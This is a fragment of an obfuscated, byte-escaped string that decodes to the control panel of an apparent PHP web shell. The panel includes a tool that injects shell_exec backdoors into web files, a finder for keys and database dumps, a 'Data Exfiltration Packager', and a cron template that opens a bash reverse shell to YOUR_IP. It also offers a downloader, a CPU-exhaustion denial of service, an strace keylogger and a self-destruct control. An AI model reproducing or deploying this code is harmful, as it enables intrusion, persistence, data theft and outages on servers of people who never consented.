4\x20\x43\157\x64\145\x3c\x2f\x62\x75\164\164\157\156\x3e\74\57\144\151\166\76\x3c\57\x64\x69\166\76\x3c\144\151\x76\x20\x69\x64\75\x22\x74\141\142\x2d\141\165\x74\x6f\55\x62\141\143\153\x64\x6f\x6f\162\42\40\143\154\x61\163\x73\75\x22\164\141\x62\55\143\x6f\x6e\x74\145\x6e\x74\42\76\x3c\x70\x20\x73\164\x79\x6c\x65\75\x22\143\x6f\154\157\162\72\x20\x76\x61\162\50\55\x2d\x74\145\x78\x74\55\155\x65\x64\x29\73\x22\76\111\156\x6a\145\143\164\163\x20\141\x20\163\151\x6d\160\x6c\x65\x20\x60\163\x68\x65\154\x6c\137\145\x78\145\x63\x60\40\x62\x61\x63\153\x64\157\157\162\40\x69\x6e\164\x6f\40\x74\150\145\x20\x66\x69\154\x65\163\40\x6c\151\163\x74\145\x64\x20\142\x65\154\x6f\167\x2e\40\x4f\156\x65\x20\146\151\x6c\145\x20\x70\x65\x72\x20\x6c\x69\x6e\x65\x2e\74\57\160\76\74\164\145\x78\x74\x61\162\x65\141\x20\x69\144\75\42\142\x61\x63\x6b\x64\x6f\x6f\162\x2d\x74\x61\162\147\x65\164\163\x22\40\163\x74\171\x6c\x65\75\42\x77\151\144\x74\150\x3a\61\60\60\x25\x3b\x20\x68\145\x69\x67\x68\x74\72\40\61\65\x30\160\x78\x3b\x20\162\x65\x73\x69\172\145\72\166\145\x72\164\x69\143\141\154\x3b\42\40\160\154\x61\x63\145\x68\157\154\144\145\162\x3d\x22\x2f\x76\x61\x72\x2f\x77\x77\x77\x2f\x68\x74\155\154\x2f\x69\x6e\144\145\x78\56\160\x68\160\42\x3e\x3c\x2f\164\145\x78\164\x61\x72\x65\141\76\74\142\165\x74\164\157\x6e\40\151\x64\x3d\x22\151\x6e\163\164\141\154\154\x2d\142\141\x63\x6b\144\x6f\157\x72\x2d\142\x74\156\x22\x20\x63\154\x61\163\163\75\42\144\141\156\x67\x65\162\55\x62\x74\x6e\x22\40\163\164\171\154\145\75\x22\155\x61\162\147\x69\x6e\x2d\164\x6f\x70\72\61\162\145\x6d\73\x22\x3e\111\156\x66\x65\143\x74\40\106\x69\154\145\163\x3c\57\142\x75\164\164\x6f\156\76\x3c\144\151\166\x20\x69\x64\75\x22\142\141\143\x6b\144\157\157\x72\x2d\162\145\x73\165\x6c\164\163\42\40\163\x74\171\x6c\x65\75\x22\x6d\141\x72\147\151\156\x2d\x74\x6f\x70\x3a\x31\162\x65\155\x3b\x22\x3e\x3c\x2f\x64\x69\166\x3e\74\57\x64\x69\x76\x3e\74\x2f\x64\x69\x76\x3e\74\57\x64\x69\x76\x3e\74\57\144\x69\166\x3e\xa\40\40\x20\x20\x20\40\x20\40\x20\74\144\x69\x76\x20\151\144\x3d\x22\166\x69\145\167\55\144\141\164\141\55\164\x6f\x6f\x6c\163\x22\40\143\x6c\141\x73\163\x3d\42\166\151\x65\167\x2d\143\x6f\156\x74\141\151\156\145\162\x22\76\x3c\x64\x69\166\x20\x63\154\x61\163\163\x3d\42\143\x6f\156\x74\x65\x6e\164\55\150\145\x61\x64\145\162\42\76\x44\x61\x74\x61\40\115\141\156\141\x67\145\155\145\156\164\x20\x54\157\157\154\x73\74\x2f\144\x69\166\76\74\144\151\x76\x20\x63\x6c\141\x73\163\75\42\x63\157\x6e\164\x65\156\164\x2d\141\162\145\141\42\76\74\x64\151\166\x20\143\x6c\x61\x73\x73\x3d\42\164\157\x6f\154\55\x73\x65\x63\164\151\x6f\156\x22\x3e\74\150\63\76\x53\145\x6e\x73\151\x74\x69\x76\x65\x20\106\x69\x6c\x65\x20\106\x69\156\144\145\x72\74\57\x68\63\76\74\x70\40\163\164\x79\154\145\75\42\143\x6f\x6c\x6f\x72\x3a\40\166\x61\x72\50\55\x2d\x74\x65\x78\164\55\155\x65\144\51\73\x22\76\123\143\141\156\x20\x61\40\144\x69\162\145\x63\x74\157\162\x79\40\x66\x6f\162\40\146\151\x6c\x65\x73\40\x63\157\x6e\x74\141\151\x6e\151\156\147\x20\163\x65\156\x73\151\x74\151\x76\x65\40\x64\141\164\x61\40\x6f\162\40\167\151\164\x68\40\163\x65\156\163\151\164\151\166\x65\40\156\x61\x6d\145\163\x20\x28\x65\56\x67\x2e\54\40\56\163\x71\x6c\x2c\40\56\160\x65\x6d\54\40\151\144\137\x72\x73\x61\51\56\74\57\160\76\74\151\x6e\160\x75\x74\40\x74\171\x70\145\x3d\42\x74\145\170\x74\x22\x20\x69\144\x3d\42\163\x65\156\x73\x69\164\151\166\145\x2d\163\143\x61\156\55\x70\x61\164\x68\x22\40\160\154\x61\x63\145\x68\157\x6c\144\145\162\x3d\42\x46\165\154\x6c\40\x70\141\164\150\x20\x74\x6f\x20\x73\143\141\x6e\x20\50\x65\56\147\56\x2c\x20\57\x76\141\x72\x2f\167\x77\x77\x29\x22\x20\163\x74\x79\154\145\75\42\x77\151\x64\x74\x68\x3a\x31\60\x30\45\73\40\x6d\x61\162\x67\151\x6e\x2d\x62\x6f\x74\x74\157\155\x3a\x31\162\145\155\x3b\x22\x3e\74\142\x75\164\164\157\x6e\x20\x69\144\75\42\162\165\x6e\55\163\x65\x6e\x73\x69\164\151\166\x65\x2d\163\x63\141\x6e\x2d\x62\164\x6e\x22\x3e\123\x63\x61\x6e\40\x66\x6f\162\x20\x53\x65\156\163\x69\x74\151\x76\x65\x20\x46\151\154\145\163\74\57\x62\165\x74\164\157\156\76\x3c\144\x69\166\x20\x69\144\75\42\x73\x65\x6e\163\151\164\x69\166\x65\x2d\x73\x63\x61\x6e\x2d\162\145\x73\x75\154\164\x73\42\x20\163\x74\171\154\145\x3d\42\x6d\141\x72\x67\151\x6e\x2d\x74\157\160\x3a\x31\162\x65\x6d\73\42\76\x3c\57\x64\x69\x76\76\74\x2f\x64\x69\x76\x3e\74\x68\162\76\74\144\x69\166\x20\x63\x6c\x61\163\x73\x3d\x22\164\157\x6f\x6c\x2d\x73\x65\143\164\151\x6f\156\x22\76\x3c\150\x33\x3e\x46\x69\154\145\57\104\x69\x72\x65\x63\164\157\162\x79\x20\103\150\x61\x6e\147\x65\x20\x4d\x6f\x6e\x69\x74\x6f\162\x3c\57\150\63\x3e\x3c\160\x20\163\x74\171\x6c\x65\75\x22\143\157\x6c\157\162\x3a\40\x76\x61\162\x28\55\55\164\145\170\164\x2d\x6d\145\144\x29\x3b\42\x3e\115\x6f\156\151\x74\x6f\x72\40\x61\x20\x70\x61\x74\x68\40\x66\157\x72\40\141\40\x73\145\164\40\x64\x75\x72\141\x74\151\157\156\40\141\x6e\144\x20\x72\145\160\x6f\162\x74\x20\141\156\171\x20\143\x72\x65\x61\x74\145\144\54\x20\144\145\154\145\x74\x65\x64\54\40\x6f\x72\x20\x6d\x6f\x64\x69\x66\151\x65\x64\40\x66\151\154\x65\163\56\74\x2f\x70\x3e\x3c\x64\151\x76\x20\x73\x74\171\154\x65\75\42\144\151\163\160\x6c\141\171\x3a\146\x6c\145\x78\x3b\x20\x67\x61\x70\72\40\x31\162\145\x6d\73\x20\x61\x6c\x69\147\x6e\x2d\151\x74\x65\x6d\163\x3a\143\145\156\x74\145\162\73\42\x3e\x3c\151\x6e\160\165\164\40\x74\171\x70\145\x3d\42\164\x65\x78\x74\42\x20\x69\144\x3d\x22\155\157\x6e\151\x74\x6f\x72\x2d\x70\x61\164\x68\x22\x20\160\x6c\x61\143\x65\x68\x6f\154\144\145\162\75\42\120\x61\164\x68\x20\x74\x6f\x20\155\x6f\x6e\151\164\157\x72\42\40\163\164\171\x6c\x65\x3d\42\x66\154\145\x78\x3a\61\x3b\x22\76\74\x69\156\160\x75\x74\x20\x74\171\160\145\x3d\x22\156\x75\x6d\142\145\162\42\x20\x69\x64\x3d\42\155\157\156\x69\x74\157\x72\x2d\x64\165\162\141\164\151\157\x6e\42\x20\x76\141\154\x75\x65\75\x22\x33\x30\x22\40\163\x74\171\x6c\x65\75\x22\167\x69\x64\164\150\72\x20\x31\60\60\x70\x78\73\x22\76\74\142\x75\x74\x74\x6f\x6e\40\151\x64\x3d\x22\162\165\x6e\x2d\x6d\x6f\156\x69\164\157\162\55\x62\x74\156\42\76\x53\164\x61\162\164\x20\115\x6f\x6e\x69\164\157\x72\151\156\x67\x3c\57\x62\165\x74\164\157\x6e\x3e\x3c\57\x64\x69\166\76\74\160\162\145\x20\151\144\75\x22\x6d\157\156\x69\x74\x6f\162\55\x72\x65\x73\165\x6c\164\163\x22\40\143\x6c\x61\x73\163\75\x22\157\x75\164\x70\x75\164\x2d\142\x6f\x78\x22\76\74\57\x70\x72\145\76\x3c\57\144\151\166\76\x3c\x68\x72\76\x3c\x64\x69\x76\x20\143\x6c\x61\x73\163\x3d\x22\x74\x6f\x6f\154\x2d\x73\145\143\164\151\157\x6e\x22\x3e\74\150\63\76\x44\141\x74\x61\x20\105\x78\x66\x69\x6c\164\162\141\x74\x69\157\156\x20\120\x61\143\153\141\x67\145\162\x3c\57\150\x33\76\74\160\x20\163\x74\171\x6c\145\75\x22\143\x6f\154\157\162\x3a\x20\x76\141\162\50\55\x2d\164\145\x78\164\x2d\x6d\145\144\51\x3b\x22\76\x53\145\x6c\x65\x63\x74\x20\x6d\165\154\x74\151\x70\x6c\x65\x20\x66\151\x6c\145\163\x2f\x64\x69\162\x65\x63\164\x6f\162\151\145\163\40\x62\145\x6c\157\x77\54\40\141\156\144\x20\164\x68\151\x73\x20\x74\x6f\x6f\154\40\167\151\x6c\154\40\x63\x72\145\x61\164\145\40\x61\x20\x73\151\x6e\147\x6c\x65\40\x64\x6f\167\x6e\154\x6f\x61\144\141\142\154\x65\40\132\x49\120\40\141\162\x63\150\x69\x76\145\56\74\57\x70\76\74\144\151\x76\x20\x69\x64\x3d\42\145\170\146\x69\154\x2d\144\x69\x72\x2d\x74\x72\x65\x65\42\40\163\164\171\154\145\75\x22\150\145\x69\x67\x68\164\x3a\x20\x33\60\60\x70\170\x3b\x20\x6f\x76\145\x72\146\154\x6f\167\x2d\171\x3a\141\x75\x74\157\73\40\142\x6f\162\x64\145\162\72\40\x31\x70\x78\x20\x73\x6f\154\151\144\40\x76\x61\x72\x28\55\x2d\x62\157\162\144\x65\x72\x2d\143\x6f\154\157\162\x29\73\x20\x70\x61\x64\144\x69\x6e\147\72\x20\61\x72\145\155\x3b\40\142\x6f\162\x64\x65\x72\55\x72\x61\144\151\165\x73\x3a\x20\x36\160\x78\x3b\x20\x6d\141\x72\147\x69\156\55\x62\x6f\x74\x74\157\155\72\x20\x31\x72\145\x6d\73\x22\76\114\157\x61\x64\x69\156\147\x20\x64\151\162\x65\143\x74\x6f\162\x79\40\x74\162\145\x65\x2e\56\56\74\x2f\144\151\x76\76\x3c\142\165\x74\164\x6f\156\x20\x69\144\x3d\42\x72\x75\x6e\x2d\x65\170\146\151\154\x2d\142\x74\156\42\76\x50\141\x63\x6b\x61\147\145\40\x26\x20\x44\157\167\156\x6c\157\141\144\40\x53\x65\154\x65\x63\164\145\x64\x3c\57\x62\165\164\x74\x6f\156\x3e\x3c\x64\x69\x76\x20\x69\x64\x3d\x22\x65\x78\x66\x69\x6c\x2d\x72\x65\x73\165\154\164\x73\42\x3e\74\57\x64\x69\x76\76\74\x2f\x64\x69\x76\76\x3c\x2f\144\x69\166\x3e\x3c\57\x64\x69\166\x3e\xa\40\x9\11\74\x64\x69\x76\x20\151\x64\x3d\42\166\x69\x65\167\x2d\x63\162\157\156\x22\40\x63\154\141\x73\163\75\42\166\151\145\x77\x2d\143\x6f\156\x74\141\x69\156\x65\162\42\76\74\x64\x69\x76\40\x63\x6c\x61\x73\163\75\42\x63\x6f\x6e\164\145\x6e\x74\x2d\150\145\141\x64\x65\x72\x22\76\103\x72\x6f\156\152\x6f\x62\40\115\x61\156\x61\x67\145\162\x3c\x2f\x64\151\166\76\74\144\x69\166\x20\x63\154\x61\163\163\75\42\143\157\156\x74\x65\x6e\x74\x2d\x61\162\x65\x61\x22\40\x73\164\x79\x6c\x65\75\42\144\x69\x73\160\x6c\141\171\72\40\x66\x6c\x65\x78\x3b\x20\146\154\145\x78\x2d\x64\151\x72\x65\143\x74\151\157\156\x3a\40\x63\157\x6c\165\x6d\156\73\42\x3e\x3c\160\x20\163\x74\171\x6c\145\75\42\143\x6f\154\x6f\162\x3a\40\166\141\x72\50\55\x2d\x74\x65\x78\x74\x2d\x6d\145\144\x29\73\x20\x6d\x61\x72\147\151\156\55\x74\x6f\x70\x3a\x30\x3b\42\76\126\x69\145\x77\40\x61\156\x64\x20\x65\x64\151\x74\x20\164\x68\x65\x20\143\162\x6f\x6e\x74\141\x62\40\x66\157\162\40\164\x68\x65\40\x63\165\x72\x72\145\x6e\164\x20\x75\x73\x65\x72\40\50\74\163\x74\162\x6f\156\147\40\151\x64\x3d\x22\x63\162\x6f\156\55\x75\x73\145\x72\x22\x3e\x3c\x2f\163\164\162\x6f\156\x67\76\x29\56\74\x2f\160\76\x3c\164\145\x78\x74\141\x72\145\x61\40\x69\144\75\x22\x63\162\x6f\x6e\55\143\x6f\x6e\164\145\x6e\164\42\40\163\164\x79\x6c\145\75\x22\146\154\145\170\x3a\x31\73\x20\167\151\x64\164\150\72\61\x30\x30\x25\x3b\x20\162\x65\163\151\x7a\x65\72\166\145\x72\x74\x69\x63\141\x6c\x3b\42\x20\x70\154\141\143\145\150\x6f\x6c\144\x65\162\75\42\x2a\x20\x2a\x20\x2a\40\x2a\x20\x2a\x20\x2f\142\x69\156\x2f\x62\x61\163\150\x20\55\x63\x20\x27\x62\141\x73\150\x20\55\x69\40\76\46\40\57\x64\145\x76\57\x74\143\160\x2f\131\x4f\x55\122\x5f\111\120\x2f\131\117\x55\122\x5f\120\117\x52\124\40\60\76\46\x31\x27\x22\x3e\74\x2f\x74\145\x78\164\141\x72\x65\x61\x3e\x3c\x62\165\x74\x74\157\156\x20\151\x64\75\x22\163\x61\x76\145\55\x63\x72\157\x6e\55\142\164\x6e\x22\40\163\164\171\154\x65\x3d\42\x6d\x61\x72\147\x69\x6e\55\164\157\160\72\61\x72\145\155\x3b\40\141\154\x69\x67\156\x2d\x73\145\154\x66\x3a\x20\x66\x6c\x65\x78\55\163\164\141\x72\x74\x3b\42\x3e\123\x61\166\145\x20\x43\x72\157\x6e\164\x61\x62\x3c\57\x62\165\x74\x74\x6f\x6e\x3e\74\x2f\x64\151\x76\x3e\x3c\57\x64\x69\x76\76\xa\40\11\x9\74\144\151\x76\40\151\x64\x3d\42\x76\x69\x65\167\55\x74\157\x6f\x6c\163\x22\x20\x63\x6c\141\x73\163\75\x22\x76\x69\145\167\x2d\x63\x6f\x6e\164\141\x69\x6e\x65\162\42\x3e\74\144\151\166\x20\143\154\x61\x73\163\x3d\x22\x63\157\x6e\164\x65\156\164\55\150\x65\141\x64\x65\x72\x22\x3e\x4d\x69\x73\143\40\x54\157\157\154\x73\74\x2f\x64\151\x76\x3e\74\x64\x69\166\40\x63\x6c\x61\163\163\75\42\143\x6f\156\164\x65\x6e\164\55\141\162\145\141\42\76\x3c\x64\151\166\x20\x63\x6c\141\x73\x73\x3d\42\x74\157\157\x6c\x2d\163\x65\x63\164\151\157\x6e\42\76\74\x68\x33\76\127\x67\145\164\x20\x28\x44\x6f\167\156\154\157\x61\144\x65\x72\51\x3c\57\x68\x33\76\x3c\144\151\166\x3e\x3c\151\156\x70\x75\164\x20\x74\171\x70\x65\x3d\42\164\x65\170\164\x22\x20\151\144\x3d\x22\167\147\145\164\x2d\165\x72\154\42\40\x70\x6c\141\143\x65\150\x6f\x6c\x64\145\162\x3d\x22\x68\164\x74\x70\163\x3a\x2f\57\x65\170\141\155\x70\154\145\56\143\x6f\155\x2f\146\x69\x6c\145\56\164\x78\x74\42\x20\163\x74\171\x6c\x65\75\42\x66\154\x65\170\72\61\x3b\x20\x6d\x61\x72\x67\x69\156\55\x72\151\147\150\164\72\61\162\145\x6d\x3b\x22\76\74\142\x75\x74\164\x6f\156\x20\151\144\75\42\x77\147\x65\164\55\142\x74\156\x22\x3e\106\x65\x74\143\150\74\57\142\x75\164\164\157\x6e\76\74\x2f\144\151\166\x3e\x3c\x2f\144\151\x76\x3e\x3c\x68\x72\76\74\x64\151\166\x20\x63\154\141\x73\x73\75\42\164\157\157\x6c\55\163\x65\143\x74\151\157\x6e\42\x3e\74\x68\63\x3e\104\x65\156\x69\141\154\x20\157\x66\x20\x53\145\162\166\x69\x63\x65\163\74\x2f\x68\63\x3e\74\x70\x20\x73\164\171\154\145\x3d\42\143\x6f\x6c\157\x72\72\x20\166\x61\162\50\x2d\x2d\164\145\x78\164\55\155\145\144\x29\x3b\42\x3e\122\165\156\x20\141\x6e\x20\151\x6e\164\145\156\163\x69\x76\145\40\x70\162\x6f\x63\x65\163\x73\40\x74\157\x20\143\157\x6e\x73\165\155\145\x20\103\x50\125\40\162\145\163\x6f\x75\162\x63\145\163\x20\146\x6f\162\40\x61\x20\163\160\145\x63\151\x66\x69\143\x20\144\165\x72\x61\x74\x69\157\x6e\56\x20\124\150\151\163\40\x63\141\x6e\40\x62\145\x20\x75\163\x65\144\40\164\157\x20\x74\145\x73\x74\40\x73\x65\162\166\145\x72\x20\163\x74\141\142\x69\x6c\151\164\171\40\x6f\x72\x20\143\162\x65\x61\164\145\40\141\40\x64\145\156\x69\141\154\40\157\x66\x20\163\x65\x72\166\x69\x63\145\x2e\74\x2f\x70\x3e\x3c\x64\151\166\76\74\151\156\160\x75\164\x20\x74\x79\x70\145\75\x22\156\x75\x6d\142\145\x72\x22\x20\x69\144\x3d\42\x68\157\x67\x2d\144\165\x72\141\x74\x69\x6f\x6e\42\x20\x76\141\154\x75\x65\75\x22\63\x30\x22\40\x73\164\x79\x6c\x65\x3d\x22\x77\151\x64\x74\150\72\x31\60\60\x70\x78\73\40\x6d\x61\162\147\151\x6e\55\162\x69\147\150\164\72\61\x72\145\x6d\73\x22\x3e\x3c\142\x75\x74\x74\157\156\x20\x69\144\75\42\x72\x75\156\x2d\x68\157\147\x2d\x62\x74\x6e\x22\x20\x63\x6c\141\x73\x73\75\42\x64\x61\x6e\147\x65\x72\55\142\x74\156\42\x3e\123\x74\x61\x72\164\x20\103\120\x55\40\110\157\147\74\57\142\x75\x74\x74\157\x6e\x3e\x3c\x2f\x64\x69\x76\76\x3c\57\x64\151\166\x3e\74\150\x72\76\74\x64\151\x76\40\143\154\141\163\x73\75\42\164\157\157\154\x2d\163\x65\143\164\x69\157\x6e\42\76\x3c\x68\63\x3e\113\145\171\154\157\x67\147\145\162\x20\50\x45\x78\x70\145\162\151\x6d\145\x6e\164\141\154\51\x3c\57\150\x33\76\x3c\160\40\x73\164\x79\x6c\x65\x3d\42\x63\x6f\x6c\157\x72\72\40\x76\x61\x72\x28\55\55\164\145\x78\x74\x2d\x6d\145\x64\51\73\42\x3e\101\x74\x74\x65\155\x70\x74\40\x74\x6f\40\x61\164\164\x61\x63\x68\40\x74\157\x20\141\x20\162\165\156\x6e\151\156\x67\x20\160\162\157\143\145\x73\x73\x20\50\x6c\x69\x6b\x65\x20\141\x20\163\150\x65\154\154\51\40\x61\x6e\x64\x20\x63\x61\160\164\x75\162\145\x20\x72\145\141\144\x2f\x77\x72\x69\164\x65\40\x73\171\163\143\x61\x6c\154\x73\56\40\x52\145\x71\x75\x69\162\x65\163\x20\x60\x73\x74\x72\x61\143\x65\140\x20\141\x6e\x64\x20\x61\160\x70\x72\x6f\160\162\151\x61\164\x65\x20\x70\145\162\x6d\x69\163\163\x69\x6f\x6e\163\56\x3c\57\x70\76\74\x64\151\166\76\x3c\151\156\160\x75\x74\40\x74\x79\160\x65\75\42\x74\145\x78\164\42\x20\151\x64\x3d\x22\153\x65\171\x6c\157\x67\147\x65\x72\55\x70\x69\x64\x22\x20\160\x6c\x61\x63\145\150\x6f\x6c\x64\x65\162\x3d\x22\x50\162\157\x63\x65\x73\163\x20\111\x44\x20\50\x50\x49\x44\x29\x22\40\163\x74\171\x6c\x65\75\42\x77\x69\144\164\150\x3a\61\x35\60\160\170\x3b\40\x6d\x61\162\147\151\x6e\x2d\x72\x69\147\x68\x74\72\61\162\x65\x6d\73\x22\76\x3c\142\x75\x74\x74\157\x6e\x20\x69\x64\x3d\x22\x72\x75\156\55\153\145\x79\154\157\x67\x67\145\x72\55\142\x74\x6e\42\76\x41\x74\x74\141\143\150\x20\164\x6f\x20\x50\x72\x6f\x63\x65\163\x73\74\x2f\142\165\164\x74\x6f\156\76\74\x2f\144\x69\x76\x3e\74\160\x72\145\x20\x69\x64\75\x22\x6b\x65\171\x6c\x6f\147\x67\145\162\55\157\165\x74\160\x75\164\x22\x20\x63\x6c\x61\x73\163\x3d\x22\157\165\164\x70\165\x74\x2d\142\157\x78\42\x3e\74\57\x70\x72\145\x3e\x3c\57\x64\151\166\76\x3c\150\162\76\74\144\151\166\x3e\74\150\63\76\x53\171\163\x74\x65\155\x3c\57\x68\x33\x3e\74\141\x20\150\x72\145\x66\x3d\42\x3f\x70\150\160\151\156\x66\157\75\61\42\x20\x74\x61\x72\147\145\164\x3d\x22\137\x62\x6c\141\156\153\42\x3e\x3c\x62\165\x74\164\x6f\x6e\x3e\120\x48\x50\x20\111\x6e\146\x6f\x3c\57\142\165\164\164\x6f\x6e\x3e\74\57\x61\x3e\x3c\x62\x75\x74\x74\157\156\40\151\x64\75\x22\163\x65\154\146\x2d\x64\145\x73\164\x72\x75\x63\x74\x2d\142\x74\x6e\x22\40\143\154\141\x73\x73\x3d\x22\x64\x61\x6e\147\x65\x72\55\x62\164\156\x22\x20\163\x74\171\154\x65\75\x22\x6d\141\x72\147\x69\156\x2d\154\x65\146\164\x3a\40\x31\x30\160\x78\73\42\x3e\x53\145\154\x66\x20\104\145\163\x74\162\x75\143\164\x3c\57\142\165\164\164\x6f\x6e\76\74\x2f\144\x69\166\x3e\74\57\144\151\x76\76\74\57\x64\151\166\76\12\11\x9\x3c\144\151\166\x20\x69\144\75\42\166\x69\x65\167\x2d\x66\x69\x6c\145\55\167\141\x74\143\150\x65\x72\x22\x20\x63\x6c\141\x73\x73\x3d\x22\166\x69\x65\x77\x2d\x63\157\x6e\164\x61\x69\156\x65\162\x22\x3e\74\144\151\166\40\x63\x6c\141\163\163\75\42\143\x6f\x6e\x74\x65\x6e\164\55\150\x65\141\144\145\162\x22\76\122\x65\x61\x6c\x2d\x74\151\x6d\145\x20\106\151\x6c\145\x20\x57\x61\x74\x63\150\x65\162\x3c\x2f\x64\x69\x76\76\x3c\144\x69\166\40\143\154\141\x73\163\x3d\x22\143\157\156\x74\x65\x6e\164\55\x61\162\145\x61\x22\x3e\74\x64\x69\x76\40\x63\x6c\x61\x73\x73\x3d\x22\x74\x6f\x6f\x6c\x2d\163\145\143\164\x69\x6f\156\x22\x3e\74\x68\x33\x3e\115\157\x6e\151\164\157\x72\x20\106\x69\154\145\40\x43\150\x61\x6e\x67\145\163\x3c\57\x68\x33\x3e\74\160\x20\163\164\x79\154\x65\75\42\143\157\154\x6f\x72\72\40\166\x61\x72\x28\55\55\164\145\170\164\x2d\x6d\x65\x64\51\x3b\42\76\x57\x61\x74\143\x68\40\141\x20\144\151\162\x65\143\164\157\x72\171\x20\146\x6f\162\40\x66\x69\x6c\x65\x20\143\x68\141\x6e\147\145\163\40\x69\156\40\162\145\141\x6c\55\164\x69\155\145\x2e\40\x44\145\x74\145\143\164\163\x20\x63\162\145\x61\164\x65\x64\54\x20\x64\x65\154\x65\x74\x65\x64\54\40\141\156\144\40\x6d\157\x64\x69\x66\151\145\x64\40\x66\x69\x6c\145\x73\x2e\x3c\x2f\160\76\74\x64\151\166\x20\163\164\171\154\x65\75\x22\144\151\x73\x70\154\141\x79\72\146\154\145\170\73\40\x67\x61\x70\x3a\40\x31\162\x65\x6d\x3b\x20\x61\x6c\151\147\156\x2d\151\164\x65\x6d\163\72\x63\x65\156\164\x65\162\x3b\40\x6d\141\x72\x67\x69\x6e\x2d\x62\x6f\x74\x74\157\155\72\61\x72\145\155\x3b\x22\76\x3c\x69\156\x70\x75\x74\x20\164\171\160\145\75\x22\164\145\170\x74\x22\x20\x69\x64\x3d\42\167\141\x74\x63\150\145\162\55\x70\x61\164\150\42\40\x70\154\x61\143\145\150\157\154\x64\145\x72\x3d\x22\x50\x61\164\150\x20\x74\157\x20\155\x6f\x6e\x69\164\157\162\x20\50\145\56\x67\x2e\x2c\40\57\x76\x61\162\57\167\167\x77\51\42\x20\163\164\x79\x6c\x65\x3d\x22\146\x6c\x65\x78\x3a\61\73\42\76\x3c\x69\x6e\x70\165\x74\40\x74\171\160\x65\x3d\x22\x6e\165\155\x62\145\x72\x22\x20\151\144\75\x22\167\141\x74\x63\150\145\x72\x2d\151\x6e\x74\145\x72\x76\141\x6c\x22\40\166\x61\154\x75\145\x3d\x22\x32\x22\40\x6d\151\156\x3d\42\61\42\40\x6d\x61\x78\75\42\66\60\x22\40\163\x74\x79\154\145\75\x22\167\151\144\164\x68\x3a\61\x30\60\x70\x78\x3b\42\40\x74\151\164\x6c\145\75\x22\103\150\x65\143\x6b\x20\x69\x6e\164\145\162\x76\x61\154\x20\151\156\x20\163\145\x63\157\156\x64\163\x22\76\x3c\x62\165\164\x74\x6f\156\x20\x69\x64\x3d\x22\163\164\x61\x72\164\x2d\x77\141\164\143\x68\x65\x72\x2d\142\164\x6e\42\x3e\x53\164\x61\x72\164\x20\x57\x61\164\x63\150\x69\x6e\x67\x3c\57\x62\x75\164\164\157\156\76\x3c\x62\x75\164\164\x6f\156\x20\x69\x64\75\x22\x73\x74\x6f\160\55\167\141\164\x63\150\145\162\55\142\x74\x6e\42\40\163\164\x79\154\145\75\x22\144\x69\x73\160\x6c\141\171\x3a\x6e\x6f\x6e\x65\x3b\42\x3e\x53\x74\x6f\160\40\x57\x61\x74\143\x68\x69\156\147\74\x2f\x62\x75\164\x74\x6f\156\x3e\x3c\57\x64\x69\x76\76\74\144\x69\x76\40\x69\x64\75\x22\x77\141\164\143\150\x65\x72\55\x73\x74\x61\x74\165\x73\x22\x20\163\x74\171\x6c\x65\x3d\x22\x6d\x61\x72\x67\151\x6e\55\x62\157\x74\x74\157\x6d\x3a\x31\162\x65\x6d\x3b\x20\160\141\x64\144\x69\156\x67\72\61\60\160\170\x3b\40\x62\141\143\x6b\147\162\157\x75\156\x64\x3a\x76\141\162\x28\x2d\x2d\142\x67\55\x6c\x69\x67\x68\x74\51\x3b\40\x62\157\x72\144\145\x72\55\162\x61\144\x69\x75\x73\x3a\66\160\x78\x3b\40\x64\x69\163\160\x6c\141\x79\x3a\156\157\x6e\x65\x3b\x22\76\74\57\144\x69\166\76\74\144\151\x76\x20\x69\x64\x3d\42\x77\141\164\x63\150\145\162\55\162\145\163\x75\x6c\x74\x73\x22\x20\x73\x74\171\x6c\x65\75\x22\155\x61\x78\55\x68\x65\x69\147\x68\x74\x3a\64\x30\60\160\170\73\40\x6f\166\145\162\146\154\x6f\167\55\171\x3a\x61\165\164\x6f\x3b\x22\76\x3c\160\162\x65\40\151\x64\x3d\42\167\141\164\143\150\x65\162\55\x6f\x75\164\x70\x75\164\42\x20\143\x6c\x61\163\163\75\x22\157\165\164\160\165\x74\55\142\x6f\170\42\40\163\x74\x79\154\145\75\x22\155\151\156\x2d\x68\x65\151\147\150\164\72\x32\x30\x30\x70\170\73\42\76\x3c\x2f\160\x72\x65\x3e\74\x2f\144\x69\166\x3e\74\x2f\144\x69\166\x3e\x3c\x2f\x64\x69\166\x3e\74\57\144\x69\x76\76\12\x9\11\x3c\x64\x69\166\x20\151\x64\x3d\x22\x76\151\x65\x77\55\x70\162\157\x63\x65\163\x73\55\155\x61\156\141\147\x65\x72\42\40\x63\154\x61\163\x73\x3d\42\166\151\145\167\x2d\143\x6f\156\x74\x61\x69\x6e\145\162\x22\x3e\x3c\144\x69\x76\40\x63\x6c\x61\163\x73\75\x22\143\x6f\156\164\145\x6e\x74\55\150\x65\141\x64\x65\x72\x22\76\x50\x72\x6f\143\x65\163\163\x20\115\x61\x6e\x61\x67\145\162\74\x2f\x64\x69\166\x3e\74\144\x69\x76\40\143\x6c\x61\163\163\75\42\x63\x6f\156\164\145\x6e\164\55\141\x72\145\141\42\x3e\x3c\x64\x69\166\40\143\x6c\x61\163\x73\75\x22\x74\x6f\x6f\154\55\x73\145\x63\x74\151\157\x6e\x22\76\74\x68\63\76\x52\165\156\156\x69\156\x67\40\x50\162\157\143\x65\163\x73\x65\163\x3c\x2f\150\x33\76\74\160\x20\x73\x74\x79\x6c\145\75\42\143\157\154\157\162\72\40\x76\141\162\x28\55\x2d\x74\x65\x78\x74\x2d\155\x65\x64\51\73\42\76\x56\151\145\x77\40\x61\156\144\x20\155\141\156\141\147\145\x20\162\x75\x6e\x6e\151\156\x67\40\160\162\x6f\143\x65\163\163\145\163\40\157\156\x20\164\x68\x65\x20\x73\x79\163\164\x65\x6d\x2e\74\57\160\76\x3c\x64\x69\x76\40\163\164\x79\154\x65\x3d\42\144\x69\163\160\154\x61\171\72\x66\x6c\145\170\73\40\x67\x61\160\x3a\61\162\x65\155\x3b\x20\155\141\x72\x67\x69\156\55\142\x6f\164\x74\x6f\x6d\72\61\x72\145\x6d\73\42\x3e\74\142\165\164\164\157\156\40\x69\x64\75\42\162\x65\146\x72\x65\163\150\x2d\160\162\x6f\143\145\163\163\x65\x73\55\142\164\156\42\x3e\xf0\237\224\204\40\122\145\146\162\145\x73\150\x3c\57\x62\165\164\164\x6f\156\76\x3c\142\165\x74\x74\x6f\156\x20\x69\144\x3d\x22\x61\165\x74\157\55\x72\x65\146\162\145\x73\150\x2d\160\162\x6f\143\145\163\x73\145\x73\x2d\x62\x74\x6e\42\76\342\x8f\xb1\xef\270\217\x20\x41\x75\x74\157\x20\